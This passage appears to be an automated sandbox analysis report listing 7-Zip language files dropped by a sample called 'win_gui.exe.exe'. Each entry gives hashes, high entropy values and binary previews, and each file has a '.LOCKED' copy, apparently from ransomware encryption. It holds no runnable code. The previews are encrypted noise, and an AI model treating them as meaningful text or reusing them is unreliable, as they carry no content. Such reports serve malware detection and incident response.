                                SHA1:A238497C59C27F449BBFD1F172B11ABEF5557774
                                SHA-256:C31A38EDAE5AF93017F94DE8EFE2BA6C869D925CB57DC91A410C0D19A6AFEE29
                                SHA-512:91F0DD29D3C10CD0BA47EE6FCC414025B282D33598926CFBE165A59E83072EE890A1DB506E7B1E59C04AAD49C166CAB5C735C02DAC8F89D47E1A11A728E4B085
                                Malicious:false
                                Preview:`...0A.$...q....G..g.u!.......w6|];Chz..)1.../.C..e..nw;<.:....B.t...../...y......hz.\......,......+3..(....:..f..\..[.l.1..`..o.!Y...lqg.X...l......5A-`?k.|..l.....9OrT._{......q.V..S....b..$o|......@Y..]6..?...)....>.sE.7*....px0...?.S...7.#.r4.Ju.....U.....8*t@id.&.(S7...m.W@6W.'....f..a.I.g.?6.P.B..%G.>`.j...ly,..B...n.0.J.......s......K...r.......;`..pm..e.v~.cb~.H....~PL..a.b u...;,..>.mg.sM.........Y....o...V..U.q....K.F.o9RV...js.}..*.B.y.e.Hq.6....A=T.h.e.........H._..'.=.Y..B7mK.......a.g.^..1....%.T.'90...f.......d.......+l................@.`l.....5;i...B.............[...:.}....k..D./...RO...A...t..r.E....<...1....a.[z..?.L@..s.L.q>.2..!...).....%.8Zc.C......n..G...N,f?bC..T...'M..B..q....g./...jbhD.Io...]@...M.?"d.k_....r...d.)......<....J.....O...K%...fm.L......>.k$2...l.....=...J....3....F..@.y....o......H..A1H;`..f.y...6.]<z........,r..nR...m..t....{....N.7...>.Z.D@....*b....hC.|h..j@<...`g/.......k.;...s9.w......o..

                                C:\Program Files\7-Zip\Lang\ne.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14062
                                Entropy (8bit):7.986586784450276
                                Encrypted:false
                                SSDEEP:384:nlEe7CFY+YGike2nuBa4gRUCjB08gWFr19Hi+VOO:nL7CqvGbUCjBFp9HiS
                                MD5:E2FB26392AA3D6B9C219267B284027EF
                                SHA1:A238497C59C27F449BBFD1F172B11ABEF5557774
                                SHA-256:C31A38EDAE5AF93017F94DE8EFE2BA6C869D925CB57DC91A410C0D19A6AFEE29
                                SHA-512:91F0DD29D3C10CD0BA47EE6FCC414025B282D33598926CFBE165A59E83072EE890A1DB506E7B1E59C04AAD49C166CAB5C735C02DAC8F89D47E1A11A728E4B085
                                Malicious:false
                                Preview:`...0A.$...q....G..g.u!.......w6|];Chz..)1.../.C..e..nw;<.:....B.t...../...y......hz.\......,......+3..(....:..f..\..[.l.1..`..o.!Y...lqg.X...l......5A-`?k.|..l.....9OrT._{......q.V..S....b..$o|......@Y..]6..?...)....>.sE.7*....px0...?.S...7.#.r4.Ju.....U.....8*t@id.&.(S7...m.W@6W.'....f..a.I.g.?6.P.B..%G.>`.j...ly,..B...n.0.J.......s......K...r.......;`..pm..e.v~.cb~.H....~PL..a.b u...;,..>.mg.sM.........Y....o...V..U.q....K.F.o9RV...js.}..*.B.y.e.Hq.6....A=T.h.e.........H._..'.=.Y..B7mK.......a.g.^..1....%.T.'90...f.......d.......+l................@.`l.....5;i...B.............[...:.}....k..D./...RO...A...t..r.E....<...1....a.[z..?.L@..s.L.q>.2..!...).....%.8Zc.C......n..G...N,f?bC..T...'M..B..q....g./...jbhD.Io...]@...M.?"d.k_....r...d.)......<....J.....O...K%...fm.L......>.k$2...l.....=...J....3....F..@.y....o......H..A1H;`..f.y...6.]<z........,r..nR...m..t....{....N.7...>.Z.D@....*b....hC.|h..j@<...`g/.......k.;...s9.w......o..

                                C:\Program Files\7-Zip\Lang\nl.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10137
                                Entropy (8bit):7.980153268688112
                                Encrypted:false
                                SSDEEP:192:g9l2W5pEsISo/sn2Tu4sZ6rVxD7o1UsRU0jvH3Co6Fce6dEgF+VOv:uZc/sn8QCVxSzR7HIFceIEc+VOv
                                MD5:5F81F3EA15FFDD7122C03065431A969A
                                SHA1:B591AB8579555199183921FDCA68BF047ABF4717
                                SHA-256:63C515C2BB6CED1E70AC3276643A14C43BF5C6FAD90300592FAC80BE80E109A0
                                SHA-512:C74E13389335F702B47C78F3B70CE7E27F7F9D5EF2A02DBF76A0B625272CF49815B1C7E2EC1E22971E9EBC61DF319246BA1B5078ECB66BCB173E2BF9E9AB9064
                                Malicious:false
                                Preview:.%.{....<.k....e`..uP._...n.;Ny...{.........R.~M..?.=.Ax-.7.....xMU........;..4e...3..{..w:G.bY....".....E...'...c....].v,L....=..K.....dl....v#ce.UR..H.h........:.i...E...o.,Y]v....8...!~`.IJ...6_.o.@BE....z...d\a'%...0L..Cp......-..9Tr.....z...~.s..xG.)......]1#w{*X....t...U.9s/..bF!R.R=B.....V>.2Iv....g.........H..6u.q.....c.lyD..*%g..!.7v....+.......33.B..)...h..#xq.+P.S.}....o$8.....J.|./l''.U.u..X....a...Gt..H.e.6.{..8....;..B.T_E.v...|..)dH.....5.d`.$b..hs1..._<..zC".}]..OE.ZPa..8..OkL.7,B....wV.D....EN..55..Hl..U.q.z.Q7......(..::t'..Sl..2}......t.T...p...7..p...qA.B..8`.4..e.CN.._q.PD.\.<E......lPV..*;..xb..xD...j.\...rT.....l..#..-....#.Zt4...S.[...P~....p....M+..K..............sE...n.l&h.....~W............3#U_?.3.6C.9.....=.lCZ.8.6.M.}5...C.....$......;...99w.2......{.p..w.#........J...ngX..h...b..Aq/vV(...f..A..#..@.@..{.....5....X.B...DA+l.#.w.....{o...E$..:...%.%..Ig..1W=.x.s.S....*..P......*y.J}X.F.x.V.,J...\s..

                                C:\Program Files\7-Zip\Lang\nl.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10137
                                Entropy (8bit):7.980153268688112
                                Encrypted:false
                                SSDEEP:192:g9l2W5pEsISo/sn2Tu4sZ6rVxD7o1UsRU0jvH3Co6Fce6dEgF+VOv:uZc/sn8QCVxSzR7HIFceIEc+VOv
                                MD5:5F81F3EA15FFDD7122C03065431A969A
                                SHA1:B591AB8579555199183921FDCA68BF047ABF4717
                                SHA-256:63C515C2BB6CED1E70AC3276643A14C43BF5C6FAD90300592FAC80BE80E109A0
                                SHA-512:C74E13389335F702B47C78F3B70CE7E27F7F9D5EF2A02DBF76A0B625272CF49815B1C7E2EC1E22971E9EBC61DF319246BA1B5078ECB66BCB173E2BF9E9AB9064
                                Malicious:false
                                Preview:.%.{....<.k....e`..uP._...n.;Ny...{.........R.~M..?.=.Ax-.7.....xMU........;..4e...3..{..w:G.bY....".....E...'...c....].v,L....=..K.....dl....v#ce.UR..H.h........:.i...E...o.,Y]v....8...!~`.IJ...6_.o.@BE....z...d\a'%...0L..Cp......-..9Tr.....z...~.s..xG.)......]1#w{*X....t...U.9s/..bF!R.R=B.....V>.2Iv....g.........H..6u.q.....c.lyD..*%g..!.7v....+.......33.B..)...h..#xq.+P.S.}....o$8.....J.|./l''.U.u..X....a...Gt..H.e.6.{..8....;..B.T_E.v...|..)dH.....5.d`.$b..hs1..._<..zC".}]..OE.ZPa..8..OkL.7,B....wV.D....EN..55..Hl..U.q.z.Q7......(..::t'..Sl..2}......t.T...p...7..p...qA.B..8`.4..e.CN.._q.PD.\.<E......lPV..*;..xb..xD...j.\...rT.....l..#..-....#.Zt4...S.[...P~....p....M+..K..............sE...n.l&h.....~W............3#U_?.3.6C.9.....=.lCZ.8.6.M.}5...C.....$......;...99w.2......{.p..w.#........J...ngX..h...b..Aq/vV(...f..A..#..@.@..{.....5....X.B...DA+l.#.w.....{o...E$..:...%.%..Ig..1W=.x.s.S....*..P......*y.J}X.F.x.V.,J...\s..

                                C:\Program Files\7-Zip\Lang\nn.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6537
                                Entropy (8bit):7.9721430468393315
                                Encrypted:false
                                SSDEEP:192:tUvZupE2VUDvCfOZRU2T0BxC0pFY39/9mmNCBUhDPy+VOc:tCupE2VUDvCfO/BT0Bs0pFY39oaDK+V5
                                MD5:D8682B92BA50A0E667F4E717716A8EDB
                                SHA1:AC8DDF988FFFC434F334F06632B87992FC6EBD77
                                SHA-256:6D929A529A935706F7A7BC50E7F47F15E295CE44A7673FBCE7B4A38197C70948
                                SHA-512:064A825F91F95DDDBF818E0FAF6AFAFF763616B29C5A0B4CB6C122F852DE7D5633A3DFF6A6C6EFA56FE98CB732BA065898CC58B4B1A7625AD6230EFDC037B251
                                Malicious:false
                                Preview:......!....."Zz....>...{..5..m..F.!o./.H.v.Y.[.........6f.u..C.."G.].......0.1<...rBL4..j8...-a5.\Ei.....s.t|L..t...*..M....,.b..I.....t..#.....W.}.n.-6....^bjo....A..N..!P.....l.C..b.c.."...P..........4..U._..F.0......~.*K...SV.........F.K.x.U...z...!.u.T.YI,..-..1.-.T7.s.b.u{..P(..?sy..W.d.3.j.$./8.......J/<.3........@m.iA$.. m...vU.Y.Q....n._T..iz.`.-.l......i.......$.....=jA..p..O.]/m?/...-.a{..c..-9..YTu..W.po.<.g...6...:P.v..IE.`.q...p...0.....C..g.b..4...bCE.....u.3;.........h<&.....9w;.N.X3dk.MVs<..F.DDR.@.I?R.v....&..wAa.po..).,.......;...oNBx..2...\t...K-.1.b....J..2..m_Ygh....C.....].gzl...2.D.,...#S....J,z.hh|f..&.n,.........@D..s.0+..U..~_T.......3:.Z.C.+...c......x...<`q...0U........4.Y.C......L....Z...#.(...qB.......7...l..?.{.EQ@./A.,/..BL.[n..S....f.iP.v...$B:..=.E.IFHO.....@.........U.&_W.T..g....H....Vj....Z...w...)...K.ziA+....{...{.m.s..Hjk.Ec..v..PH.LS.m..C.F...g...!...6.>...f.W[...#5 0.^5c.DO....u.....|za

                                C:\Program Files\7-Zip\Lang\nn.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6537
                                Entropy (8bit):7.9721430468393315
                                Encrypted:false
                                SSDEEP:192:tUvZupE2VUDvCfOZRU2T0BxC0pFY39/9mmNCBUhDPy+VOc:tCupE2VUDvCfO/BT0Bs0pFY39oaDK+V5
                                MD5:D8682B92BA50A0E667F4E717716A8EDB
                                SHA1:AC8DDF988FFFC434F334F06632B87992FC6EBD77
                                SHA-256:6D929A529A935706F7A7BC50E7F47F15E295CE44A7673FBCE7B4A38197C70948
                                SHA-512:064A825F91F95DDDBF818E0FAF6AFAFF763616B29C5A0B4CB6C122F852DE7D5633A3DFF6A6C6EFA56FE98CB732BA065898CC58B4B1A7625AD6230EFDC037B251
                                Malicious:false
                                Preview:......!....."Zz....>...{..5..m..F.!o./.H.v.Y.[.........6f.u..C.."G.].......0.1<...rBL4..j8...-a5.\Ei.....s.t|L..t...*..M....,.b..I.....t..#.....W.}.n.-6....^bjo....A..N..!P.....l.C..b.c.."...P..........4..U._..F.0......~.*K...SV.........F.K.x.U...z...!.u.T.YI,..-..1.-.T7.s.b.u{..P(..?sy..W.d.3.j.$./8.......J/<.3........@m.iA$.. m...vU.Y.Q....n._T..iz.`.-.l......i.......$.....=jA..p..O.]/m?/...-.a{..c..-9..YTu..W.po.<.g...6...:P.v..IE.`.q...p...0.....C..g.b..4...bCE.....u.3;.........h<&.....9w;.N.X3dk.MVs<..F.DDR.@.I?R.v....&..wAa.po..).,.......;...oNBx..2...\t...K-.1.b....J..2..m_Ygh....C.....].gzl...2.D.,...#S....J,z.hh|f..&.n,.........@D..s.0+..U..~_T.......3:.Z.C.+...c......x...<`q...0U........4.Y.C......L....Z...#.(...qB.......7...l..?.{.EQ@./A.,/..BL.[n..S....f.iP.v...$B:..=.E.IFHO.....@.........U.&_W.T..g....H....Vj....Z...w...)...K.ziA+....{...{.m.s..Hjk.Ec..v..PH.LS.m..C.F...g...!...6.>...f.W[...#5 0.^5c.DO....u.....|za

                                C:\Program Files\7-Zip\Lang\pa-in.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15271
                                Entropy (8bit):7.988409792530994
                                Encrypted:false
                                SSDEEP:384:AK3MqsT5xuN/kotjFevRJqJEbblYKQ4/37EQ+VOC:AK3MqAbRCepcabblYIEQm
                                MD5:FE0A6D02AAC35FD94A9B3FB1E6E09AEB
                                SHA1:1149F1AE4FD8652E26FC3BCBDF9403A6D8C1BA2E
                                SHA-256:D5F2D48E20CAC66BB2DA7E79BA07CF9B094679FE47059456882169301E79B04E
                                SHA-512:56B2B75A2EF9979FEB7EF9107E3BACE3F0204F42D183AECE07C19E5B6E89D78139FD4EFDFD50CE814B1BE442AE01F627A61E9375E8F7484893A89D628EDCE3E7
                                Malicious:false
                                Preview:^k...m.....E.E.sf...V.uk.%..^o.U.......W_.X&.&.b.L.Cm..(..4%l#..B5.UL.~B3.t..*....$.}.......m~u5+Tg.^BFL...n...h.79....!.(....j..>..].."f8.Q.V.S.$..y;..W....6..{.~......[...^..Gw..?h."..1f........GC...,b.(.E........N..........<k.W....6..m.....3.j.66._!U..... zcA.{...(.;......j....b$...y..]f...uB.C.... ......o.[..V8:..Yv...$./... E..Z.X.1z.'k..LY.......!n.R...'Qs^...A8.I..e..*.h.....C]......:...#8koNZ.Y.%9..+.jC..p(^~.r.*..u..;.....~.~.c}...*...SEDZ.%..Y.f$f.%;..#.M.-GJ....~.......fX.....(.;H..?th(rR.....V.z4H.."w..4N.W?..NS...j.z..f;f....}.R..M.^)8{.......y.....6]...u.E....t.4..".jK.hw..B.?....7.?.....*\.......v..1..v.Bc.Df....9...CS .34.ToSA...v?3kl...2...5R9<6)..!....K...s...;.0fkl2...Y....(.q.7..f..6...G.}....9.R....`H....]F...8."..\.....'.....v.I...*.)wR...n..,w.....o..6:..\..6......~....)DRW..I.G.-.6.@.5SF...\.nG.....L..].7...=6Q..*......s`.F.4I...qy(.Rx..Tm.J.8...c1.#.I...Z.Y.'.i...E...d.m.....8.U.$~p.e.......J..p..T./5KG..%g

                                C:\Program Files\7-Zip\Lang\pa-in.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15271
                                Entropy (8bit):7.988409792530994
                                Encrypted:false
                                SSDEEP:384:AK3MqsT5xuN/kotjFevRJqJEbblYKQ4/37EQ+VOC:AK3MqAbRCepcabblYIEQm
                                MD5:FE0A6D02AAC35FD94A9B3FB1E6E09AEB
                                SHA1:1149F1AE4FD8652E26FC3BCBDF9403A6D8C1BA2E
                                SHA-256:D5F2D48E20CAC66BB2DA7E79BA07CF9B094679FE47059456882169301E79B04E
                                SHA-512:56B2B75A2EF9979FEB7EF9107E3BACE3F0204F42D183AECE07C19E5B6E89D78139FD4EFDFD50CE814B1BE442AE01F627A61E9375E8F7484893A89D628EDCE3E7
                                Malicious:false
                                Preview:^k...m.....E.E.sf...V.uk.%..^o.U.......W_.X&.&.b.L.Cm..(..4%l#..B5.UL.~B3.t..*....$.}.......m~u5+Tg.^BFL...n...h.79....!.(....j..>..].."f8.Q.V.S.$..y;..W....6..{.~......[...^..Gw..?h."..1f........GC...,b.(.E........N..........<k.W....6..m.....3.j.66._!U..... zcA.{...(.;......j....b$...y..]f...uB.C.... ......o.[..V8:..Yv...$./... E..Z.X.1z.'k..LY.......!n.R...'Qs^...A8.I..e..*.h.....C]......:...#8koNZ.Y.%9..+.jC..p(^~.r.*..u..;.....~.~.c}...*...SEDZ.%..Y.f$f.%;..#.M.-GJ....~.......fX.....(.;H..?th(rR.....V.z4H.."w..4N.W?..NS...j.z..f;f....}.R..M.^)8{.......y.....6]...u.E....t.4..".jK.hw..B.?....7.?.....*\.......v..1..v.Bc.Df....9...CS .34.ToSA...v?3kl...2...5R9<6)..!....K...s...;.0fkl2...Y....(.q.7..f..6...G.}....9.R....`H....]F...8."..\.....'.....v.I...*.)wR...n..,w.....o..6:..\..6......~....)DRW..I.G.-.6.@.5SF...\.nG.....L..].7...=6Q..*......s`.F.4I...qy(.Rx..Tm.J.8...c1.#.I...Z.Y.'.i...E...d.m.....8.U.$~p.e.......J..p..T./5KG..%g

                                C:\Program Files\7-Zip\Lang\pl.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10419
                                Entropy (8bit):7.979776154390843
                                Encrypted:false
                                SSDEEP:192:vUsKXxwxTunYO/UYF1xvZoGF8gI7GhKhOCrkD9CEc+4e+VOW:tqY8F/vHFJIqAhOCrkYXM+VOW
                                MD5:7B31E4F5979E9A3A083EC852A58CA5D0
                                SHA1:E39EFBC792DFCE907238E8868F362F356F27CE7D
                                SHA-256:50A02346507C161E0AF0C8F1E0D4B6DEF8D6DAF852DCC2D93A1221447C3DEC86
                                SHA-512:B3F1A1949BEB678FFF0D7B2E97D87200E9B7654847FB35925D09933DDD8ADB26216DCE254D08DA9A882B56374375811811EFB5B08A0DC6F978882BEA09E6514D
                                Malicious:false
                                Preview:..D..]..)A..p.q?/B.*...}u.vcAHI.)..}B...K..\...o..0>AZ ...;..&N..)e8]..WR...y.d.z..$8R...M.>[.:r.....~1F.f.#u..;.r.Z.B.Z&..g.Tg.>Or..R.Xq..,"....g. 9h-.G;....*..R-....p...E..c.aH..vi3./j5k@...b..d..t..9|.[Y.......2y..v..w@....Jg.{m.D.6 T..ji....0z.Y.h?.4hh..&...h<....4.p.N#n...s..7.g[b]..ycW..S[....{+)iC....5.@.H......M..m....._p.V..g..P..b.R...p.....\...S..0.i..(....{....533.W..........8.....1.n....=.4Pf...w...[F.o..#.w.5.........{O...u...6..X......"..;.....q.s..kd.i...5<c.R9M*.>D..R......J5.O<..N,M.(..Xg...j1^.....a..W.d^...'..'..Z.f.{.p...f..\.zV...>.6D._..E..O...O.".....#.#.....l...q.c9..^........q'.~Y..........#5.|.6......U....y......J/|...L.ll...`.......]..t...~.,.{M.&.0..<9.HP3....$.S..tV.*z.H.....K...A..........[c..W..Y..^.V.}...l.6.0"./.|.....W.".p."x..wcO~N.q.6.Y/.....V'..!.a....G..+"..o-....c......_I4....M.|........X.B...AN.S. ...M..qH.(....[........Cc.,NL]1..v|....>.NK.`K{.X......l..y....._..... ...{.;...'.;..>Q.-

                                C:\Program Files\7-Zip\Lang\pl.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10419
                                Entropy (8bit):7.979776154390843
                                Encrypted:false
                                SSDEEP:192:vUsKXxwxTunYO/UYF1xvZoGF8gI7GhKhOCrkD9CEc+4e+VOW:tqY8F/vHFJIqAhOCrkYXM+VOW
                                MD5:7B31E4F5979E9A3A083EC852A58CA5D0
                                SHA1:E39EFBC792DFCE907238E8868F362F356F27CE7D
                                SHA-256:50A02346507C161E0AF0C8F1E0D4B6DEF8D6DAF852DCC2D93A1221447C3DEC86
                                SHA-512:B3F1A1949BEB678FFF0D7B2E97D87200E9B7654847FB35925D09933DDD8ADB26216DCE254D08DA9A882B56374375811811EFB5B08A0DC6F978882BEA09E6514D
                                Malicious:false
                                Preview:..D..]..)A..p.q?/B.*...}u.vcAHI.)..}B...K..\...o..0>AZ ...;..&N..)e8]..WR...y.d.z..$8R...M.>[.:r.....~1F.f.#u..;.r.Z.B.Z&..g.Tg.>Or..R.Xq..,"....g. 9h-.G;....*..R-....p...E..c.aH..vi3./j5k@...b..d..t..9|.[Y.......2y..v..w@....Jg.{m.D.6 T..ji....0z.Y.h?.4hh..&...h<....4.p.N#n...s..7.g[b]..ycW..S[....{+)iC....5.@.H......M..m....._p.V..g..P..b.R...p.....\...S..0.i..(....{....533.W..........8.....1.n....=.4Pf...w...[F.o..#.w.5.........{O...u...6..X......"..;.....q.s..kd.i...5<c.R9M*.>D..R......J5.O<..N,M.(..Xg...j1^.....a..W.d^...'..'..Z.f.{.p...f..\.zV...>.6D._..E..O...O.".....#.#.....l...q.c9..^........q'.~Y..........#5.|.6......U....y......J/|...L.ll...`.......]..t...~.,.{M.&.0..<9.HP3....$.S..tV.*z.H.....K...A..........[c..W..Y..^.V.}...l.6.0"./.|.....W.".p."x..wcO~N.q.6.Y/.....V'..!.a....G..+"..o-....c......_I4....M.|........X.B...AN.S. ...M..qH.(....[........Cc.,NL]1..v|....>.NK.`K{.X......l..y....._..... ...{.;...'.;..>Q.-

                                C:\Program Files\7-Zip\Lang\ps.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9248
                                Entropy (8bit):7.977948824062632
                                Encrypted:false
                                SSDEEP:192:WKjJ5EAhukM41gIWxFDIv38qXL62DvJyIzL1atuOW7XBU0BWC+VORg:TJ5ngkM4agvML2rJyIzL1ROWFpWC+VOS
                                MD5:E27B2D56093A1A801EE5BDC8C31BE9E1
                                SHA1:3D63E5C604F375D8147F5D1885E00B66FD8A47D3
                                SHA-256:A26221E158076B30EFE3E4E6807D9E619637947DFE4004AF2CB13228A09F91BE
                                SHA-512:78BAB5AA1FD3EA70291B2F089926A1FE5F4DDCBB17AF40D11BC204D518BC5BE3BCDC4208AFDF265FF3C6696420B069AE118C63E449017379151873451B72B20D
                                Malicious:false
                                Preview:.I.&(.49.L:.$./p,n.];..d...........Z..s.4y.e..8.Ab..M;3J..9.../...{.|?l.I..wNP....9.W....2..h.O.......4|..7y%#.....e.1.....{[..."..e..E...lCJ....lh:..:H......l..o...Khw.Ti._.o.RzeVc..).!5U.).L.<.eq.B....Pv!._.....Z.KI...zn.U.q!....K.4.L.+k.d'..j/.".O.,...H..J..de..c..w.g.......KN.|ucIa(..iweh(......OI...@...Z........A.......K....0..,.......1J....1... ..H..R.n.W%.JU.4c5ai....[...q..*..Sw.O.P,BS...L`s...[;s.K.Dn....e.W0..u....r......Y.......T...l.s....kQ8..K.\.u......:.{:w.;..~M.v.A.T+&.B*.......|...c6........_I......k.>.=6]...G:!~w=F~dP.1(V.F......oX..t\..q....e..=...Ob..s. .{.=:.M2Y..c....%">&...@.....R.4.{.*S"Q.%d......bh.Q..........qD..1.f*..l6e..{...m.~...9b.8.#Fn...~.$Oac..HN.f. ~.?...7.>.U.X..$..*........L.[....i.[.'.xg...\..T.~..O'A.pJ.....i..)_&.p~(:.B6.qD...C...@..Fu..lIea.*.....3..=...k.@..c..@..R.$L.~'G7e....D....,d.n.`.}.n.......Mm.A)...c...S...So.G..e.N.......#p1:#+..........w..B...'.Pr...{.Jh98.uzxf../:Q.$n......7.X......{Oi...5.{.k

                                C:\Program Files\7-Zip\Lang\ps.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9248
                                Entropy (8bit):7.977948824062632
                                Encrypted:false
                                SSDEEP:192:WKjJ5EAhukM41gIWxFDIv38qXL62DvJyIzL1atuOW7XBU0BWC+VORg:TJ5ngkM4agvML2rJyIzL1ROWFpWC+VOS
                                MD5:E27B2D56093A1A801EE5BDC8C31BE9E1
                                SHA1:3D63E5C604F375D8147F5D1885E00B66FD8A47D3
                                SHA-256:A26221E158076B30EFE3E4E6807D9E619637947DFE4004AF2CB13228A09F91BE
                                SHA-512:78BAB5AA1FD3EA70291B2F089926A1FE5F4DDCBB17AF40D11BC204D518BC5BE3BCDC4208AFDF265FF3C6696420B069AE118C63E449017379151873451B72B20D
                                Malicious:false
                                Preview:.I.&(.49.L:.$./p,n.];..d...........Z..s.4y.e..8.Ab..M;3J..9.../...{.|?l.I..wNP....9.W....2..h.O.......4|..7y%#.....e.1.....{[..."..e..E...lCJ....lh:..:H......l..o...Khw.Ti._.o.RzeVc..).!5U.).L.<.eq.B....Pv!._.....Z.KI...zn.U.q!....K.4.L.+k.d'..j/.".O.,...H..J..de..c..w.g.......KN.|ucIa(..iweh(......OI...@...Z........A.......K....0..,.......1J....1... ..H..R.n.W%.JU.4c5ai....[...q..*..Sw.O.P,BS...L`s...[;s.K.Dn....e.W0..u....r......Y.......T...l.s....kQ8..K.\.u......:.{:w.;..~M.v.A.T+&.B*.......|...c6........_I......k.>.=6]...G:!~w=F~dP.1(V.F......oX..t\..q....e..=...Ob..s. .{.=:.M2Y..c....%">&...@.....R.4.{.*S"Q.%d......bh.Q..........qD..1.f*..l6e..{...m.~...9b.8.#Fn...~.$Oac..HN.f. ~.?...7.>.U.X..$..*........L.[....i.[.'.xg...\..T.~..O'A.pJ.....i..)_&.p~(:.B6.qD...C...@..Fu..lIea.*.....3..=...k.@..c..@..R.$L.~'G7e....D....,d.n.`.}.n.......Mm.A)...c...S...So.G..e.N.......#p1:#+..........w..B...'.Pr...{.Jh98.uzxf../:Q.$n......7.X......{Oi...5.{.k

                                C:\Program Files\7-Zip\Lang\pt-br.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10531
                                Entropy (8bit):7.9792688692585845
                                Encrypted:false
                                SSDEEP:192:4kEhQhFekCtSbr6KOqXSGOROMjPOSmJ41VO7pzq3iUoT8ZLpZKXdA7Ccc9+VOD:4k7jRCcbZricMDRmfz+BoYZjST9+VOD
                                MD5:34D37505BEC6C567C5D528338CDDFD4F
                                SHA1:30B23A80871B186B7ACDE48EF004ED34DE2B7A3E
                                SHA-256:CE9244BC689D0052B956692A4F8FA4F8C9D00D60AE689C7E43BE65FF638C1F18
                                SHA-512:926DF4EBAD21E2315005285551A44A5C859FEC5A266979B04537F81FD80B5EBE30F62D115BB18A4FB9F7AB69419335A6854FE256912647D0426747F772D7E12E
                                Malicious:false
                                Preview:.TA.b..0.K...w..J...?S%...+...a1e~._...t.B)...W......kvH....~t.....).G7..1.?P...>..)....g....[....OO...1..}.1x/.Q.p.{J..q....a.I1.*..L'q. k....C.*7.X3@Tg.C..m5K...G...D..5.%.n..9.7 .4.....g.....0.J...9..L.ni1R...e..g..H%.3....>.mw.1..O.Ss.B..=..R.....'.X`.l~..g,3..R!.G.I....\<.E%...h)..&.Lxz...n.V.k.>./..wZI....$V..g.IQ...bw.......q..L..Eq.;.yUm...yO.0.J.EXg..G(..i....n..) ..u..Z...Nr.VX.E......~..%}l....~h..Ee+.?..^7&.l....&.f.....5.G.O.E>zN$K..2].....Zwm.....d.]s+.W:....k-.y'.hr2...... ....dZ.#......n.E_.E..^Xwa.....&.....r.A.*...;~..D........6_vHb.Ft{.G......M.=..j.....-...E.|(o....dE...e.Ab..7a.....VD.<...P1...qn....&.U._..8.&......Q.. ..e".......J.B...]F.."..C.`.9)...]5/.S..G..dx..e52.....z:V..~OL.K1.e(52J.R=.....g;.)#...e...}.n....D..^@.&..^...i..=....p..L..vb.rb.......:.G...^..Hc.`/X$~.j.....F<$.r..75.p..JN]..Z.[...-=....Z.z@P..=.....Pj...U).D.#.X..P..q......`.>..o.4{.Y..<.Ts......D......g.....l....nk..._.K.4.I..).'y...&n.K......N.b. ,

                                C:\Program Files\7-Zip\Lang\pt-br.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10531
                                Entropy (8bit):7.9792688692585845
                                Encrypted:false
                                SSDEEP:192:4kEhQhFekCtSbr6KOqXSGOROMjPOSmJ41VO7pzq3iUoT8ZLpZKXdA7Ccc9+VOD:4k7jRCcbZricMDRmfz+BoYZjST9+VOD
                                MD5:34D37505BEC6C567C5D528338CDDFD4F
                                SHA1:30B23A80871B186B7ACDE48EF004ED34DE2B7A3E
                                SHA-256:CE9244BC689D0052B956692A4F8FA4F8C9D00D60AE689C7E43BE65FF638C1F18
                                SHA-512:926DF4EBAD21E2315005285551A44A5C859FEC5A266979B04537F81FD80B5EBE30F62D115BB18A4FB9F7AB69419335A6854FE256912647D0426747F772D7E12E
                                Malicious:false
                                Preview:.TA.b..0.K...w..J...?S%...+...a1e~._...t.B)...W......kvH....~t.....).G7..1.?P...>..)....g....[....OO...1..}.1x/.Q.p.{J..q....a.I1.*..L'q. k....C.*7.X3@Tg.C..m5K...G...D..5.%.n..9.7 .4.....g.....0.J...9..L.ni1R...e..g..H%.3....>.mw.1..O.Ss.B..=..R.....'.X`.l~..g,3..R!.G.I....\<.E%...h)..&.Lxz...n.V.k.>./..wZI....$V..g.IQ...bw.......q..L..Eq.;.yUm...yO.0.J.EXg..G(..i....n..) ..u..Z...Nr.VX.E......~..%}l....~h..Ee+.?..^7&.l....&.f.....5.G.O.E>zN$K..2].....Zwm.....d.]s+.W:....k-.y'.hr2...... ....dZ.#......n.E_.E..^Xwa.....&.....r.A.*...;~..D........6_vHb.Ft{.G......M.=..j.....-...E.|(o....dE...e.Ab..7a.....VD.<...P1...qn....&.U._..8.&......Q.. ..e".......J.B...]F.."..C.`.9)...]5/.S..G..dx..e52.....z:V..~OL.K1.e(52J.R=.....g;.)#...e...}.n....D..^@.&..^...i..=....p..L..vb.rb.......:.G...^..Hc.`/X$~.j.....F<$.r..75.p..JN]..Z.[...-=....Z.z@P..=.....Pj...U).D.#.X..P..q......`.>..o.4{.Y..<.Ts......D......g.....l....nk..._.K.4.I..).'y...&n.K......N.b. ,

